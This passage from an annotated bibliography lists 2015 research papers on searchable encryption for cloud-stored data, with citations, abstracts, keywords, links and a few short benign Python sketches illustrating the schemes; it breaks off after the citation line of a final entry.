Chang Liu; Liehuang Zhu; Jinjun Chen, "Efficient Searchable Symmetric Encryption for Storing Multiple Source Data on Cloud," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 451-458, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.406

Abstract: Cloud computing has greatly facilitated large-scale data outsourcing due to its cost efficiency, scalability and many other advantages. Subsequent privacy risks force data owners to encrypt sensitive data, hence making the outsourced data no longer searchable. Searchable Symmetric Encryption (SSE) is an advanced cryptographic primitive addressing the above issue, which maintains efficient keyword search over encrypted data without disclosing much information to the storage provider. Existing SSE schemes implicitly assume that original user data is centralized, so that a searchable index can be built at once. Nevertheless, especially in cloud computing applications, user-side data centralization is not reasonable, e.g. an enterprise distributes its data in several data centers. In this paper, we propose the notion of Multi-Data-Source SSE (MDS-SSE), which allows each data source to build a local index individually and enables the storage provider to merge all local indexes into a global index afterwards. We propose a novel MDS-SSE scheme, in which an adversary only learns the number of data sources, the number of entire data files, the access pattern and the search pattern, but not any other distribution information such as how data files or search results are distributed over data sources. We offer rigorous security proof of our scheme, and report experimental results to demonstrate the efficiency of our scheme.

Keywords: cloud computing; cryptography; storage management; MDS-SSE scheme; cloud computing; large-scale data outsourcing; multiple source data storage; searchable symmetric encryption; Cloud computing; Distributed databases; Encryption; Indexes; Servers; Cloud Computing; Data Outsourcing; Multiple Data Sources; Searchable Symmetric Encryption (ID#: 16-9140)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345314&isnumber=7345233

 

Mithuna, R.; Suguna, M., "Integrity checking Over Encrypted Cloud Data," in Signal Processing, Communication and Networking (ICSCN), 2015 3rd International Conference on, pp. 1-5, 26-28 March 2015. doi: 10.1109/ICSCN.2015.7219916

Abstract: Cloud providers offer various promising services to users, and this makes the cloud very popular among users. Cloud computing is location-independent computing wherein files are outsourced as a service. Users outsource their data to a third-party cloud server to reduce various costs such as storage and management. The outsourced data may contain sensitive and valuable information that needs to be secured. In order to assure confidentiality, users encrypt their data before outsourcing it to the cloud server, but the searching and retrieval of encrypted files then becomes complex. The existing works on searchable encryption focus on single keyword search, multi-keyword search, and Boolean keyword search, and rarely vary the search results. In Multi-Keyword Ranked Search over Encrypted Cloud Data (MRSE), a ranked searchable symmetric encryption scheme is used for efficient retrieval of similar data from the cloud server based on ranking. Even though the ranking scheme provides the most similar files from the cloud server, one cannot be sure whether the retrieved files have the same fields or not. In this paper, for the first time, the ranking fixed by the cloud server is tested to check the correctness of its order. A rank test method is used to check the integrity of the rank order over the search results. Since the rank fixed by the cloud server is checked, the user can get accurate results, and so privacy can be improved.

Keywords: cloud computing; cryptography; data integrity; data privacy; information retrieval; outsourcing; Boolean keyword search; MRSE; cloud computing; cloud provider; data confidentiality; encrypted file; integrity checking; location independent computing; multikeyword ranked search over encrypted cloud data; multikeyword search; outsourced data; outsourcing; rank test method; ranked searchable symmetric encryption scheme; ranking scheme; retrieved file; searchable encryption focus; single keyword search; third party cloud server; Encryption; Legged locomotion; Outsourcing; Privacy; Servers; cloud computing; encrypted file; integrity; privacy preserving; ranked results (ID#: 16-9141)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7219916&isnumber=7219823
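The rank test amounts to a simple client-side check: recompute a relevance score for each returned file after decryption and verify that the server's ordering is consistent. A minimal sketch (the score function here is hypothetical; MRSE-style schemes rank by coordinate-matching scores):

    def verify_rank_order(returned_files, score):
        # score(f) recomputes the relevance score for file f client-side;
        # the server's ranking is accepted only if scores never increase
        scores = [score(f) for f in returned_files]
        return all(a >= b for a, b in zip(scores, scores[1:]))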

 

Peisong Shen; Chi Chen; Xue Tian; Jing Tian, "A Similarity Evaluation Algorithm and Its Application in Multi-Keyword Search on Encrypted Cloud Data," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1218-1223, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357612

Abstract: Searchable symmetric encryption (SSE), known as privacy-preserving keyword search, allows users to perform keyword search on encrypted data. However, until now there have been no practical SSE schemes which can support query-document similarity evaluation and provide top-k retrieval on encrypted cloud data. This problem slows the adoption of SSE schemes in cloud storage services. In this paper, we propose a server-side similarity evaluation algorithm to realize sorted search functionality. Based on this, we further propose an entire SSE solution to achieve the goal of privacy-preserving multi-keyword dynamic sorted (MKDS) search functionality, which steps closer to practical deployment. We formally demonstrate the security of our scheme and evaluate its practical performance on a real-world dataset.

Keywords: cloud computing; private key cryptography; MKDS; SSE schemes; cloud storage; encrypted cloud data; multikeyword search; privacy-preserving keyword search; privacy-preserving multikeyword dynamic sorted; query-document similarity evaluation; searchable symmetric encryption; similarity evaluation algorithm; Cloud computing; Encryption; Heuristic algorithms; Indexes; Servers; ciphertext search; multi-keyword search; searchable symmetric encryption; similarity evaluation; top-k search (ID#: 16-9142)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357612&isnumber=7357245

 

Fisch, B.A.; Vo, B.; Krell, F.; Kumarasubramanian, A.; Kolesnikov, V.; Malkin, T.; Bellovin, S.M., "Malicious-Client Security in Blind Seer: A Scalable Private DBMS," in Security and Privacy (SP), 2015 IEEE Symposium on, pp. 395-410, 17-21 May 2015. doi: 10.1109/SP.2015.31

Abstract: The Blind Seer system (Oakland 2014) is an efficient and scalable DBMS that affords both client query privacy and server data protection. It also provides the ability to enforce authorization policies on the system, restricting client's queries while maintaining the privacy of both query and policy. Blind Seer supports a rich query set, including arbitrary boolean formulas, and is provably secure with respect to a controlled amount of search pattern leakage. No other system to date achieves this tradeoff of performance, generality, and provable privacy. A major shortcoming of Blind Seer is its reliance on semi-honest security, particularly for access control and data protection. A malicious client could easily cheat the query authorization policy and obtain any database records satisfying any query of its choice, thus violating basic security features of any standard DBMS. In sum, Blind Seer offers additional privacy to a client, but sacrifices a basic security tenet of DBMS. In the present work, we completely resolve the issue of a malicious client. We show how to achieve robust access control and data protection in Blind Seer with virtually no added cost to performance or privacy. Our approach also involves a novel technique for a semi-private function secure function evaluation (SPF-SFE) that may have independent applications. We fully implement our solution and report on its performance.

Keywords: Boolean functions; authorisation; data protection; database management systems; query processing; Blind Seer system; Boolean formulas; SPF-SFE; authorization policies; client query privacy; malicious-client security; query authorization policy; robust access control; scalable private DBMS; search pattern leakage; semiprivate function secure function evaluation; server data protection; Cryptography; Indexes; Logic gates; Privacy; Protocols; Servers; applied cryptography; private DBMS; searchable encryption (ID#: 16-9143)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163038&isnumber=7163005

 

Cheng Guo; Qiongqiong Song; Ruhan Zhuang; Bin Feng, "RSAE: Ranked Keyword Search over Asymmetric Encrypted Cloud Data," in Big Data and Cloud Computing (BDCloud), 2015 IEEE Fifth International Conference on, pp. 82-86, 26-28 Aug. 2015. doi: 10.1109/BDCloud.2015.11

Abstract: Cloud computing is becoming more and more popular and is applied in many practical applications because it is much cheaper and more powerful. In a cloud system, users can outsource local data to the cloud servers to lighten their local storage and computing resource loads, which produces a new industry model of use-on-demand, pay-on-use. However, outsourcing data to cloud servers centralizes sensitive information in the server, which poses a great challenge to protecting sensitive information privacy. For privacy preservation, the user encrypts sensitive data before outsourcing. Traditional searchable encryption methods make it possible for users to securely conduct keyword search over encrypted data and finally retrieve the most relevant Top-N files among the whole data set. In this paper, we systematically propose a scheme to solve the problem of how to securely and efficiently retrieve the Top-N files by keyword-based searching over asymmetrically encrypted data.

Keywords: cloud computing; cryptography; data privacy; information retrieval; RSAE; Top-N file retrieval; asymmetric encrypted cloud data; cloud computing; data outsourcing; pay-on-use method; ranked keyword search; searchable encryption methods; sensitive information privacy; use-on-demand method; Cascading style sheets; Cloud computing; Encryption; Keyword search; Servers; Top-N files retrieval; asymmetric encryption; cloud data; identity based encryption; keyword search; searchable encryption (ID#: 16-9144)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7310720&isnumber=7310694

 

Lai, R.W.F.; Chow, S.S.M., "Structured Encryption with Non-interactive Updates and Parallel Traversal," in Distributed Computing Systems (ICDCS), 2015 IEEE 35th International Conference on, pp. 776-777, June 29 2015-July 2 2015. doi: 10.1109/ICDCS.2015.104

Abstract: Searchable Symmetric Encryption (SSE) encrypts data in such a way that it can be searched efficiently. Some recent SSE schemes allow modification of data, yet they may incur storage overhead to support parallelism in searching, or additional computation to minimize the potential leakage incurred by an update, both of which penalize performance. Moreover, most of them consider only keyword search and are not applicable to arbitrary structured data. In this work, we propose the first parallel and dynamic symmetric-key structured encryption, which supports queries over an encrypted data structure. Our scheme leverages the rather simple randomized binary search tree to achieve non-interactive queries and updates.

Keywords: cryptography; data structures; parallel processing; query processing; SSE scheme; arbitrary structured data; dynamic symmetric-key structured encryption; encrypted data structure; noninteractive query; noninteractive update; parallel symmetric-key structured encryption; parallel traversal; potential leakage; randomized binary search tree; searchable symmetric encryption; structured encryption; Binary search trees; Complexity theory; Databases; Encryption; Keyword search; Servers; dynamic; non-interactive; parallel; structured encryption; symmetric searchable encryption (ID#: 16-9145)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7164982&isnumber=7164877

 

Strizhov, M.; Ray, I., "Substring Position Search over Encrypted Cloud Data Using Tree-Based Index," in Cloud Engineering (IC2E), 2015 IEEE International Conference on, pp. 165-174, 9-13 March 2015. doi: 10.1109/IC2E.2015.33

Abstract: Existing Searchable Encryption (SE) solutions are able to handle simple Boolean search queries, such as single- or multi-keyword queries, but cannot handle substring search queries over encrypted data that also involve identifying the position of the substring within the document. These types of queries are relevant in areas such as searching DNA data. In this paper, we propose a tree-based Substring Position Searchable Symmetric Encryption (SSP-SSE) scheme to close the existing gap. Our solution efficiently finds occurrences of a substring over encrypted cloud data. We formally define the leakage functions and security properties of SSP-SSE. Then, we prove that the proposed scheme is secure against chosen-keyword attacks that involve an adaptive adversary. Our analysis demonstrates that SSP-SSE introduces very low overhead on computation and storage.

Keywords: cloud computing; cryptography; query processing; trees (mathematics); DNA data; SSP-SSE; adaptive adversary; boolean search queries; chosen-keyword attacks; cloud data; leakage functions; multikeyword queries; security properties; single keyword queries; substring position search; substring position searchable symmetric encryption; tree-based index; Cloud computing; Encryption; Indexes; Keyword search; Probabilistic logic; cloud computing; position heap tree; searchable symmetric encryption; substring position search (ID#: 16-9146)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092914&isnumber=7092808
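The query SSP-SSE answers has a straightforward plaintext analogue: report every document and offset at which the substring occurs. The sketch below shows that analogue (SSP-SSE answers the same query via an encrypted position heap tree rather than a linear scan of plaintext):

    def substring_positions(docs, pattern):
        # doc_id -> starting offsets of every occurrence of pattern
        hits = {}
        for doc_id, text in docs.items():
            offsets, start = [], text.find(pattern)
            while start != -1:
                offsets.append(start)
                start = text.find(pattern, start + 1)
            if offsets:
                hits[doc_id] = offsets
        return hits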

 

Hongwei Li; Dongxiao Liu; Kun Jia; Xiaodong Lin, "Achieving Authorized and Ranked Multi-Keyword Search Over Encrypted Cloud Data," in Communications (ICC), 2015 IEEE International Conference on, pp. 7450-7455, 8-12 June 2015. doi: 10.1109/ICC.2015.7249517

Abstract: In cloud computing, it is important to protect user data. Thus, data owners usually encrypt their data before outsourcing them to the cloud server for security and privacy reasons. At the same time, users very often need to find data for specific keywords of interest to them. This motivates research on the searchable encryption technique, which allows a search user to search over encrypted data. Many mechanisms have been proposed, mainly focusing on the symmetric searchable encryption (SSE) technique. However, they do not consider the search authorization problem, which requires the cloud server to return search results only to authorized users. In this paper, we propose an authorized and ranked multi-keyword search scheme (ARMS) over encrypted cloud data by leveraging ciphertext policy attribute-based encryption (CP-ABE) and SSE techniques. Security analysis demonstrates that the proposed ARMS scheme can achieve confidentiality of documents, trapdoor unlinkability, and collusion resistance. Extensive experiments show that ARMS is superior to and more efficient than existing approaches in terms of functionality and computational overhead.

Keywords: authorisation; cloud computing; cryptography; data protection; search problems; ARMS scheme; CP-ABE scheme; SSE technique; authorized and ranked multikeyword search scheme; ciphertext policy attribute-based encryption scheme; cloud computing; cloud data encryption; cloud server; collusion resistance; computational overhead; data privacy; data security; document confidentiality; search authorization problem; symmetric searchable encryption technique; trapdoor unlinkability; user data protection; Authorization; Encryption; Indexes; Servers; Sun; Multi-keyword Ranked Search; Search Authorization; Searchable Encryption (ID#: 16-9147)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7249517&isnumber=7248285

 

Strizhov, M., "Towards a Practical and Efficient Search over Encrypted Data in the Cloud," in Cloud Engineering (IC2E), 2015 IEEE International Conference on, pp. 496-498, 9-13 March 2015. doi: 10.1109/IC2E.2015.86

Abstract: Searchable encryption allows a client to encrypt its document collection in such a way that the encrypted collection can still be searched. The most immediate application of searchable encryption is privacy/confidentiality preserving cloud storage, where it enables a client to securely outsource its document collection to an untrusted cloud provider without sacrificing the ability to search over it. Our research focuses on developing a novel searchable encryption framework that allows the cloud server to perform multi-keyword ranked search as well as substring search incorporating position information. We present some advances that we have accomplished in this area. We then lay out our planned research work and a timeline to accomplish it.

Keywords: cloud computing; cryptography; data privacy; document handling; file servers; information retrieval; storage management; cloud server; document collection; encrypted data; multikeyword ranked search; position information; privacy/confidentiality preserving cloud storage; searchable encryption; substring search; untrusted cloud provider; Encryption; Frequency measurement; Indexes; Search problems; Servers; cloud computing; ranked search; searchable symmetric encryption; substring position search (ID#: 16-9148)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092967&isnumber=7092808

 

Dong, Qiuxiang; Guan, Zhi; Chen, Zhong, "Attribute-Based Keyword Search Efficiency Enhancement via an Online/Offline Approach," in Parallel and Distributed Systems (ICPADS), 2015 IEEE 21st International Conference on, pp. 298-305, 14-17 Dec. 2015. doi: 10.1109/ICPADS.2015.45

Abstract: Searchable encryption is a primitive, which not only protects data privacy of data owners but also enables data users to search over the encrypted data. Most existing searchable encryption schemes are in the single-user setting. There are only few schemes in the multiple data users setting, i.e., encrypted data sharing. Among these schemes, most of the early techniques depend on a trusted third party with interactive search protocols or need cumbersome key management. To remedy the defects, the most recent approaches borrow ideas from attribute-based encryption to enable attribute-based keyword search (ABKS). However, all these schemes incur high computational costs and are not suitable for mobile devices, such as mobile phones, with power consumption constraints. In this paper, we develop new techniques that split the computation for the keyword encryption and trapdoor/token generation into two phases: a preparation phase that does the vast majority of the work to encrypt a keyword or create a token before it knows the keyword or the attribute list/access control policy that will be used. A second phase then rapidly assembles an intermediate ciphertext or trapdoor when the specifics become known. The preparation work can be performed while the mobile device is plugged into a power source, then it can later rapidly perform keyword encryption or token generation operations on the move without significantly draining the battery. We name our scheme Online/Offline ABKS. To the best of our knowledge, this is the first work on constructing efficient multi-user searchable encryption scheme for mobile devices through moving the majority of the cost of keyword encryption and token generation into an offline phase.

Keywords: Cloud computing; Encryption; Keyword search; Search problems; Servers; Mobile Devices; Multi-Owner/Multi-User; Offline; Online; Power Consumption; Searchable Encryption (ID#: 16-9149)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7384308&isnumber=7384203
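The two-phase split can be illustrated with a toy discrete-log example. Everything here is our illustrative assumption, not the paper's construction: the group is a small Mersenne-prime group and the token shape is invented purely to show where the precomputed work is consumed.

    import secrets, hashlib

    P = 2**127 - 1   # Mersenne prime, illustration only (far too small in practice)
    G = 3

    def offline_prepare(n):
        # Expensive phase: do the modular exponentiations while the device
        # is plugged in, before any keyword or policy is known
        return [(r, pow(G, r, P))
                for r in (secrets.randbelow(P - 2) + 1 for _ in range(n))]

    def online_token(pool, secret_key: bytes, keyword: str):
        # Cheap phase on the move: consume one precomputed pair, then
        # only hash and multiply (hypothetical token shape)
        r, g_r = pool.pop()
        h = int.from_bytes(
            hashlib.sha256(secret_key + keyword.encode()).digest(), "big")
        return (g_r, (h * r) % (P - 1))

The point of the pattern is visible in the cost split: offline_prepare performs all modular exponentiations, while online_token costs only one hash and one modular multiplication.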

 

Petcher, A.; Morrisett, G., "A Mechanized Proof of Security for Searchable Symmetric Encryption," in Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 481-494, 13-17 July 2015. doi: 10.1109/CSF.2015.36

Abstract: We present a mechanized proof of security for an efficient Searchable Symmetric Encryption (SSE) scheme completed in the Foundational Cryptography Framework (FCF). FCF is a Coq library for reasoning about cryptographic schemes in the computational model that features a small trusted computing base and an extensible design. Through this effort, we provide the first mechanized proof of security for an efficient SSE scheme, and we demonstrate that FCF is well-suited to reasoning about such complex protocols.

Keywords: cryptographic protocols; inference mechanisms; theorem proving; trusted computing; Coq library; FCF; SSE scheme; cryptographic scheme; foundational cryptography framework; protocol; reasoning; searchable symmetric encryption; security mechanized proof; trusted computing; Databases; Encryption; Games; Semantics; Servers (ID#: 16-9150)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243749&isnumber=7243713

 

Frank, J.C.; Frank, S.M.; Thurlow, L.A.; Kroeger, T.M.; Miller, E.L.; Long, D.D.E., "Percival: A Searchable Secret-Split Datastore," in Mass Storage Systems and Technologies (MSST), 2015 31st Symposium on, pp. 1-12, May 30 2015-June 5 2015. doi: 10.1109/MSST.2015.7208296

Abstract: Maintaining information privacy is challenging when sharing data across a distributed long-term datastore. In such applications, secret splitting the data across independent sites has been shown to be a superior alternative to fixed-key encryption; it improves reliability, reduces the risk of insider threat, and removes the issues surrounding key management. However, the inherent security of such a datastore normally precludes it from being directly searched without reassembling the data; this, however, is neither computationally feasible nor without risk since reassembly introduces a single point of compromise. As a result, the secret-split data must be pre-indexed in some way in order to facilitate searching. Previously, fixed-key encryption has also been used to securely pre-index the data, but in addition to key management issues, it is not well suited for long term applications. To meet these needs, we have developed Percival: a novel system that enables searching a secret-split datastore while maintaining information privacy. We leverage salted hashing, performed within hardware security modules, to access prerecorded queries that have been secret split and stored in a distributed environment; this keeps the bulk of the work on each client, and the data custodians blinded to both the contents of a query as well as its results. Furthermore, Percival does not rely on the datastore's exact implementation. The result is a flexible design that can be applied to both new and existing secret-split datastores. When testing Percival on a corpus of approximately one million files, it was found that the average search operation completed in less than one second.

Keywords: cryptography; data privacy; Percival; distributed environment; distributed long-term datastore; hardware security modules; information privacy; salted hashing; searchable secret-split datastore; Encryption; Hardware; Indexes; Search problems; Servers (ID#: 16-9151)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208296&isnumber=7208272
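The secret-splitting primitive underlying such a datastore is simple to sketch: XOR the data with independent random shares so that any proper subset of shares is uniformly random. A minimal n-of-n split follows (Percival's datastore, its distribution across independent sites, and the salted-hash query index add much more on top):

    import os

    def secret_split(data: bytes, n: int):
        # n-of-n XOR split: any n-1 shares reveal nothing about the data
        shares = [os.urandom(len(data)) for _ in range(n - 1)]
        last = data
        for s in shares:
            last = bytes(x ^ y for x, y in zip(last, s))
        shares.append(last)
        return shares

    def reassemble(shares):
        out = shares[0]
        for s in shares[1:]:
            out = bytes(x ^ y for x, y in zip(out, s))
        return out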

 

Gopularam, B.P.; Dara, S.; Niranjan, N., "Experiments in Encrypted and Searchable Network Audit Logs," in Emerging Information Technology and Engineering Solutions (EITES), 2015 International Conference on, pp. 18-22, 20-21 Feb. 2015. doi: 10.1109/EITES.2015.13

Abstract: We consider the scenario where a consumer can securely outsource their network telemetry data to a Cloud Service Provider and enable a third party to audit such telemetry for any security forensics. In particular, we consider the use case of privacy-preserving search in network log audits. In this paper we experiment with advances in Identity-Based Encryption and Attribute-Based Encryption schemes for auditing network logs.

Keywords: cloud computing; cryptography; data privacy; digital forensics; telemetry; attribute-based encryption; cloud service provider; encrypted network audit logs; identity based encryption; network telemetry data; privacy preserving search; searchable network audit logs; security forensics; Encryption; Privacy; Public key; Servers; Telemetry; audit log privacy; identity based encryption; network telemetry (ID#: 16-9152)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7083378&isnumber=7082065

 

Xingliang Yuan; Xinyu Wang; Yilei Chu; Cong Wang; Chen Qian, "Towards a Scalable, Private, and Searchable Key-Value Store," in Communications and Network Security (CNS), 2015 IEEE Conference on, pp. 773-774, 28-30 Sept. 2015. doi: 10.1109/CNS.2015.7346929

Abstract: Modern distributed key-value stores are offering superior performance, incremental scalability, and fine availability for data-intensive computing and cloud-based applications. Among those distributed data stores, the designs that ensure the confidentiality of sensitive data, however, have not been fully explored yet. In this paper, we focus on designing and implementing a scalable, private, and searchable key-value store. We first design a secure data partition algorithm that distributes encrypted data evenly across a cluster of nodes. Based on this algorithm, we then implement an encrypted key-value store. To enable secure search queries for given attributes or keywords, we leverage searchable symmetric encryption to design the encrypted local indexes that consider security, efficiency, and data locality simultaneously. Performance evaluation at Microsoft Azure is conducted in terms of Put/Get throughput and latency under different workloads. The comparison with HBase shows that our prototype can function in a practical manner.

Keywords: cryptography; telecommunication security; encrypted key-value store; private key-value store; scalable key-value store; searchable key-value store; secure data partition algorithm; secure search queries; Cloud computing; Distributed databases; Encryption; Indexes; Throughput (ID#: 16-9153)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346929&isnumber=7346791
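
As a rough illustration of the secure data partition step described in this abstract, the toy sketch below shows how a keyed hash of a record key can both hide the key from the storage nodes and spread records evenly across a cluster. It is not the authors' algorithm; the node list, key, and place function are invented.

```python
# Toy hash-based partitioning of records across a cluster. A keyed HMAC of
# the record key picks the node, so placement reveals nothing useful about
# the key while still spreading load evenly. Not the paper's algorithm.
import hashlib, hmac, os
from collections import Counter

NODES = ["node-0", "node-1", "node-2", "node-3"]
PARTITION_KEY = os.urandom(32)  # secret, so placement leaks nothing useful

def place(record_key: str) -> str:
    digest = hmac.new(PARTITION_KEY, record_key.encode(), hashlib.sha256).digest()
    return NODES[int.from_bytes(digest[:8], "big") % len(NODES)]

# Even-spread check over many synthetic keys.
load = Counter(place(f"user:{i}") for i in range(10_000))
print(load)  # each node receives roughly 2,500 records
```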

 

Rui Zhang; Rui Xue, "Efficient Keyword Search for Public-Key Setting," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1236-1241, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357615

Abstract: Querying over encrypted data is gaining increasing popularity in cloud-based data hosting services. Security and efficiency are recognized as two important and yet conflicting requirements for querying over encrypted data. In this paper we propose an efficient public-key encryption with keyword search scheme (EPEKS for short) that supports binary search over inverted index-based encrypted data. First, we describe approaches of constructing a searchable encryption scheme that supports binary search. Second, we present a novel framework for EPEKS, and provide its formal security definitions in terms of IND-PEKS-CKA security and search pattern privacy by modifying Nishioka's security notions [1]. Third, built on the proposed framework, we design a concrete EPEKS scheme based on groups of prime order. The scheme enjoys strong notions of security, namely statistical IND-PEKS-CKA security and statistical search pattern privacy. Finally, we experimentally evaluate the proposed EPEKS scheme and show that it is significantly more efficient in terms of search over encrypted data than existing search-pattern-secure PEKS schemes.

Keywords: public key cryptography; statistical analysis; telecommunication security; EPEKS; Nishioka security notion; binary search; cloud based data hosting service; inverted index-based data encryption; keyword search scheme; public key encryption; statistical IND-PEKS-CKA security; statistical search pattern privacy; Encryption; Indexes; Privacy; Public key; Servers (ID#: 16-9154)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357615&isnumber=7357245

 

Wang, Boyang; Li, Ming; Wang, Haitao; Li, Hui, "Circular Range Search on Encrypted Spatial Data," in Communications and Network Security (CNS), 2015 IEEE Conference on, pp. 182-190, 28-30 Sept. 2015. doi: 10.1109/CNS.2015.7346827

Abstract: Searchable encryption is a promising technique enabling meaningful search operations to be performed on encrypted databases while protecting user privacy from untrusted third-party service providers. However, while most of the existing works focus on common SQL queries, geometric queries on encrypted spatial data have not been well studied. Especially, circular range search is an important type of geometric query on spatial data which has wide applications, such as proximity testing in Location-Based Services and Delaunay triangulation in computational geometry. In this paper, we propose two novel symmetric-key searchable encryption schemes supporting circular range search. Informally, both of our schemes can correctly verify whether a point is inside a circle on encrypted spatial data without revealing data privacy or query privacy to a semi-honest cloud server. We formally define the security of our proposed schemes, prove that they are secure under Selective Chosen-Plaintext Attacks, and evaluate their performance through experiments in a real-world cloud platform (Amazon EC2).

Keywords: Cloud computing; Data privacy; Encryption; Nearest neighbor searches; Servers; Spatial databases (ID#: 16-9155)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346827&isnumber=7346791
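
For readers unfamiliar with the query type, the underlying plaintext predicate is simple; the paper's contribution is evaluating it on encrypted coordinates without revealing them. A plain-Python version of the test, with invented sample values:

```python
# The plaintext predicate behind circular range search: is a point inside a
# circle? Shown only to make the query type concrete; the scheme above
# evaluates this on encrypted spatial data.
def in_circle(px: float, py: float, cx: float, cy: float, r: float) -> bool:
    # Compare squared distances to avoid a square root.
    return (px - cx) ** 2 + (py - cy) ** 2 <= r * r

print(in_circle(3.0, 4.0, 0.0, 0.0, 5.0))  # True: exactly on the boundary
print(in_circle(4.0, 4.0, 0.0, 0.0, 5.0))  # False
```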

 

Pengyan Shen; Kai Guo; Mingzhong Xiao; Quanqing Xu, "Spy: A QoS-Aware Anonymous Multi-Cloud Storage System Supporting DSSE," in Cluster, Cloud and Grid Computing (CCGrid), 2015 15th IEEE/ACM International Symposium on, pp. 951-960, 4-7 May 2015. doi: 10.1109/CCGrid.2015.88

Abstract: Constructing an overlay storage system based on multiple personal cloud storages is a desirable technique and novel idea for cloud storage. Existing designs provide the basic functions with some customized features. Unfortunately, some important issues have been ignored, including privacy protection, QoS, and cipher-text search. In this paper, we present Spy, our design for an anonymous storage overlay network on multiple personal cloud storages, supporting flexible QoS awareness and cipher-text search. We reform the original Tor protocol by extending the command set and adding a tail part to the Tor cell, which makes coordination among proxy servers possible while still keeping anonymity. Based on this, we propose a flexible user-defined QoS policy and employ a Dynamic Searchable Symmetric Encryption (DSSE) scheme to support secure cipher-text search. Extensive security analysis proves that privacy is preserved, and experiments show how different QoS policies work under different security requirements.

Keywords: cloud computing; cryptography; data privacy; information retrieval; quality of service; storage management; DSSE; QoS-aware anonymous multicloud storage system; Spy; Tor cell; Tor protocol; anonymous storage overlay network; cipher-text search; dynamic searchable symmetric encryption scheme; flexible QoS awareness; flexible user-defined QoS policy; multiple personal cloud storage; multiple personal cloud storages; overlay storage system; privacy protection; security requirements; Cloud computing; Encryption; Indexes; Quality of service; Servers; Cipher-text search; DSSE; PCS; Privacy Preserving; QoS (ID#: 16-9156)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7152581&isnumber=7152455

 

Dongsheng Wang; Xiaohua Jia; Cong Wang; Kan Yang; Shaojing Fu; Ming Xu, "Generalized Pattern Matching String Search on Encrypted Data in Cloud Systems," in Computer Communications (INFOCOM), 2015 IEEE Conference on, pp. 2101-2109, April 26 2015-May 1 2015. doi: 10.1109/INFOCOM.2015.7218595

Abstract: Searchable encryption is an important and challenging issue. It allows people to search on encrypted data. This is a very useful function when more and more people choose to host their data in the cloud and the cloud server is not fully trustable. Existing solutions for searchable encryption are only limited to some simple functions of search, such as boolean search or similarity search. In this paper, we propose a scheme for Generalized Pattern-matching String-search on Encrypted data (GPSE) in cloud systems. GPSE allows users to specify their search queries by using generalized wildcard-based string patterns (such as SQL-like patterns). It gives users great expressive power in specifying highly targeted search queries. In the framework of GPSE, we particularly implemented two most commonly used pattern matching search functions on encrypted data, the substring matching and the longest-prefix-first matching. We also prove that GPSE is secure under the known-plaintext model. Experiments over real data sets show that GPSE achieves high search accuracy.

Keywords: cloud computing; cryptography; query processing; string matching; GPSE scheme;cloud systems; encrypted data; generalized pattern matching string search; generalized wildcard-based string patterns; known-plaintext model; longest-prefix-first matching; search query specification; searchable encryption; substring matching; Accuracy; Cryptography; Euclidean distance; Indexes; Pattern matching; Servers (ID#: 16-9157)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218595&isnumber=7218353
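
The two search functions named in the abstract are easy to state in the clear; GPSE's contribution is evaluating them on encrypted data. The sketch below shows plaintext analogues only, with invented helper names (like_to_regex, longest_prefix_first) and sample data:

```python
# Plaintext analogues of GPSE's two pattern-matching functions: substring
# matching and longest-prefix-first matching, driven by SQL-like wildcard
# patterns ('%' = any run of characters, '_' = one character).
import re

def like_to_regex(pattern: str) -> re.Pattern:
    parts = (re.escape(c) if c not in "%_" else (".*" if c == "%" else ".")
             for c in pattern)
    return re.compile("^" + "".join(parts) + "$")

def substring_match(needle, haystack):
    return [s for s in haystack if needle in s]

def longest_prefix_first(query, candidates):
    """Return the candidate sharing the longest common prefix with the query."""
    def common_prefix_len(a, b):
        n = 0
        for x, y in zip(a, b):
            if x != y:
                break
            n += 1
        return n
    return max(candidates, key=lambda c: common_prefix_len(query, c), default=None)

words = ["secure", "search", "secret", "server"]
print(like_to_regex("se%ch").match("search") is not None)  # True
print(substring_match("ec", words))                        # ['secure', 'secret']
print(longest_prefix_first("secr", words))                 # 'secret'
```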

 

Boyang Wang; Ming Li; Haitao Wang; Hui Li, "Circular Range Search on Encrypted Spatial Data," in Distributed Computing Systems (ICDCS), 2015 IEEE 35th International Conference on, pp. 794-795, June 29 2015-July 2 2015. doi: 10.1109/ICDCS.2015.113

